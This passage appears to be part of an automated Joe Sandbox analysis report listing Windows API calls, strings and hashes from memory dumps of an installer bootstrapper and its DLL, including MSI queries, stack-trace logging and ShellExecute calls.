                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: GetWindowRect.USER32(00000000,?,?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569E12
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: MapWindowPoints.USER32(00000000,?,00000002,00000002,?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569E23
                                                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 6A56A372
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Long$DeleteDialogItemMessageObjectPointsRectSendVisible
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2368538989-0
                                                                                                                                                                                                                                                                          • Opcode ID: c862d541b29c0c55f347c6d51a65527d6ee290e40dee66dd2722e1ea82d77b7c
                                                                                                                                                                                                                                                                          • Instruction ID: a0947b662ffd5badd9dda817ea3da06e8bc9c467e7959c18a8fbdc51d15b6c15
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c862d541b29c0c55f347c6d51a65527d6ee290e40dee66dd2722e1ea82d77b7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4061D531640215ABDB10DF68CC89BAEBBF4FF49321F111619E626E66E0DB34D940CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • #74.MSI(?,UpgradeCode,?,00000001,00000001,?,AA831995,00000000,00000000), ref: 6A54F922
                                                                                                                                                                                                                                                                          • #74.MSI(?,UpgradeCode,?,00000001,00000002,?), ref: 6A54F96C
                                                                                                                                                                                                                                                                          • #74.MSI(?,ProductCode,?,00000001,00000001,?,?,?), ref: 6A54FA8E
                                                                                                                                                                                                                                                                          • #74.MSI(?,ProductCode,?,00000001,00000002,?,?,?,?), ref: 6A54FAD8
                                                                                                                                                                                                                                                                          • #205.MSI(00000000,00000000,00000000,?,00000001,?,00000000,?,?,?,?,?), ref: 6A54FBF3
                                                                                                                                                                                                                                                                          • #205.MSI(00000000,00000000,00000001,?,?,?,?,?,00000000,?,?,?,?,?), ref: 6A54FCF2
                                                                                                                                                                                                                                                                          • #70.MSI(?,VersionString,?,00000001,00000001,?,?,00000000,?,?,?,?,?), ref: 6A54FD98
                                                                                                                                                                                                                                                                          • #70.MSI(?,VersionString,?,00000001,00000002,?,?,?,00000000,?,?,?,?,?), ref: 6A54FDEF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: #205
                                                                                                                                                                                                                                                                          • String ID: ProductCode$UpgradeCode$VersionString
                                                                                                                                                                                                                                                                          • API String ID: 1037638882-776498540
                                                                                                                                                                                                                                                                          • Opcode ID: 62e4330b10be8eab17125da7c724a18d6b6ff9e02538e2704a57ad91c56540da
                                                                                                                                                                                                                                                                          • Instruction ID: 194254007dc91c548739483decf1417f276c8a7a5c4cf38bc9477594658f90c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62e4330b10be8eab17125da7c724a18d6b6ff9e02538e2704a57ad91c56540da
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D226570804259DEEB25CF68CD98BEEBBB0EF55308F1181D9D509A7281EB746E88CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0045B2F4,DF534560,?,?,00000000), ref: 002BEC03
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560,?,?,?,?,?,?,?,?,00000000,003B0277,000000FF), ref: 002BEC15
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,003B0277,000000FF), ref: 002BEC22
                                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 002BEC2D
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,003D744C,00000000), ref: 002BEE0E
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 002BEEEA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Current$EnterHandleInitializeLeaveModuleProcessThread
                                                                                                                                                                                                                                                                          • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$MODULE_BASE_ADDRESS$[0x%.8Ix]
                                                                                                                                                                                                                                                                          • API String ID: 3051236879-1086252000
                                                                                                                                                                                                                                                                          • Opcode ID: 0cba7eee538b43bee8bed8cb3a76af7f9c726f7af4e8196c8af1a80ed16411a8
                                                                                                                                                                                                                                                                          • Instruction ID: 4a197afc1d554e41e588f10836ba2d8a0a4b92c13ddc845fcf0c137fd90e34b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cba7eee538b43bee8bed8cb3a76af7f9c726f7af4e8196c8af1a80ed16411a8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C167719003889FDF26DFA4CC55BEE7BB8FF55304F004169E9099B281DBB5AA08CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0045B2F4,DF534560,?,?,00000000), ref: 002BEC03
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560,?,?,?,?,?,?,?,?,00000000,003B0277,000000FF), ref: 002BEC15
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,003B0277,000000FF), ref: 002BEC22
                                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 002BEC2D
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,003D744C,00000000), ref: 002BEE0E
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 002BEEEA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Current$EnterHandleInitializeLeaveModuleProcessThread
                                                                                                                                                                                                                                                                          • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$MODULE_BASE_ADDRESS$[0x%.8Ix]
                                                                                                                                                                                                                                                                          • API String ID: 3051236879-1086252000
                                                                                                                                                                                                                                                                          • Opcode ID: 7108e9ef343e2d9d14d67bc4f5d2938d1092c610b572945f114c9d769a500a26
                                                                                                                                                                                                                                                                          • Instruction ID: b7eea9570b8209f1ad0c875a32d2427a1ec2dda6e5eea69ab29dc4dab8886ab9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7108e9ef343e2d9d14d67bc4f5d2938d1092c610b572945f114c9d769a500a26
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5A157719003899FDF26DFA4CC55BEE7BA8BF15308F004169E909AB291DBB59B08CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SymGetLineFromAddr.DBGHELP(?,00000000,?,?,AA831995), ref: 6A568081
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CF66
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CFA3
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,AA831995,?,00000000,?,?,?,AA831995), ref: 6A5683E2
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6A5683E9
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF1B
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF4E
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: RtlWakeAllConditionVariable.NTDLL ref: 6A56CFC5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddrAddressConditionFromLibraryLineLoadProcVariableWake
                                                                                                                                                                                                                                                                          • String ID: -> $%hs()$%hs:%ld$-----$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                                                                                                                          • API String ID: 962329029-582907586
                                                                                                                                                                                                                                                                          • Opcode ID: bf3912c38efa73345a3da296cf3f8e0cedb6a56cb8a71096c9b0b70f623fbd92
                                                                                                                                                                                                                                                                          • Instruction ID: 27366dd70bcf942e4ddbcf2ae601a7652a2e322108ba06bd576b291375c3173c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3912c38efa73345a3da296cf3f8e0cedb6a56cb8a71096c9b0b70f623fbd92
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F16EB0900258DFDB21CF68C898BDEBBB4FF55304F10469DE419A7291DB75AA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,6A58C76D,000000FF), ref: 6A548DDB
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,6A58C76D), ref: 6A548E3E
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 6A548E65
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00000000,6A58C76D,000000FF), ref: 6A548F3C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,6A58C76D,000000FF), ref: 6A548F45
                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005,?,?,?,?,?,?,?,00000000,6A58C76D,000000FF), ref: 6A548F7E
                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005,?,?,?,?,?,?,?,00000000,6A58C76D,000000FF), ref: 6A548FB6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharExecuteFileMultiShellWide$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                          • String ID: -_.~!*'();:@&=+$,/?#[]$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                                          • API String ID: 520909297-1501725305
                                                                                                                                                                                                                                                                          • Opcode ID: 3586c94dee1b6c77b7fcf9d4914670746f73cb9cbd3815d4f04fca7b868c771d
                                                                                                                                                                                                                                                                          • Instruction ID: 36a8133130daadce252c8e8c7b53cbe4e520755c2833fad461d1e7069db5bdbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3586c94dee1b6c77b7fcf9d4914670746f73cb9cbd3815d4f04fca7b868c771d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07813771904249AFEB20CF68CC85BDE7BF5EB56304F11056AE654AB2C1DB709A09C7E3
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BBD7E
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BBED7
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,DF534560,?,?), ref: 002BBF5F
                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 002BBF66
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 002BBF7A
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 002BBF81
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,00000000,00000000,003D9C94,00000002,?,?), ref: 002BC010
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 002BC017
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreen
                                                                                                                                                                                                                                                                          • String ID: Error
                                                                                                                                                                                                                                                                          • API String ID: 1077374386-2619118453
                                                                                                                                                                                                                                                                          • Opcode ID: f143fe7a07b96464d6382494107e7f0179a0bcbd4c55e43e9fa5b8b2234f149e
                                                                                                                                                                                                                                                                          • Instruction ID: 5640109faa0ed53368a7159ab18a58a57db55dec1bc52b79cb1b5b32d0003e88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f143fe7a07b96464d6382494107e7f0179a0bcbd4c55e43e9fa5b8b2234f149e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6225970D10309DFDB10DFA8C845BDEBBB4EF55314F244299E419AB291DBB4AA88CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF530: LoadLibraryW.KERNEL32(Shlwapi.dll,?,00000000,?,00000001,002CA241,00000001,DF534560,?,00000000,00000001), ref: 002BF54B
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF530: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 002BF561
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF530: FreeLibrary.KERNEL32(00000000), ref: 002BF59A
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,DF534560,?,00000000,00000001), ref: 002CA420
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                                                                                                                                                                                                                                          • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                                                                                                                                                                                                                                          • API String ID: 788177547-1020860216
                                                                                                                                                                                                                                                                          • Opcode ID: ecd4eae4c49669a0752885f16bd53caac18c0bc380f0f0bdfc67954a838ef356
                                                                                                                                                                                                                                                                          • Instruction ID: 625f059b9689de6e63f71eb2efd5721acaa7d86d6f9abef9d22e9e5c6a5ed1f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecd4eae4c49669a0752885f16bd53caac18c0bc380f0f0bdfc67954a838ef356
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C91147161025A9BDB249F24D815FEAB3A5FF60318F1087ADE806C7291E771DD51CB82
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _wcschr
                                                                                                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKLM
                                                                                                                                                                                                                                                                          • API String ID: 2691759472-1956487666
                                                                                                                                                                                                                                                                          • Opcode ID: b5552321e287076cdc0de7a28f9050115e3b457f167d1459b333ccd3a343c36a
                                                                                                                                                                                                                                                                          • Instruction ID: b67f8fbb44b84d333991ae40df3d95c772ca560939e00aa0383ea9d4e143a0ba
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5552321e287076cdc0de7a28f9050115e3b457f167d1459b333ccd3a343c36a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23412C71EA03569BDF116B56CC02F5EB7A8EB04722F184639FD24E62D0E771DD24CA90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ComCtl32.dll,AA831995), ref: 6A565CC4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 6A565CE7
                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 6A565D11
                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 6A565D17
                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00007F01,00000001,00000000,00000000,00008040), ref: 6A565D29
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 6A565D47
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoadMetricsSystem$AddressFreeImageProc
                                                                                                                                                                                                                                                                          • String ID: ComCtl32.dll$LoadIconMetric$P{[j
                                                                                                                                                                                                                                                                          • API String ID: 1983857168-4005027585
                                                                                                                                                                                                                                                                          • Opcode ID: dc9ab35d6ae9b4f3952787e08e121b59cd4d8cc6228a1598c4f52f68d88c2d2c
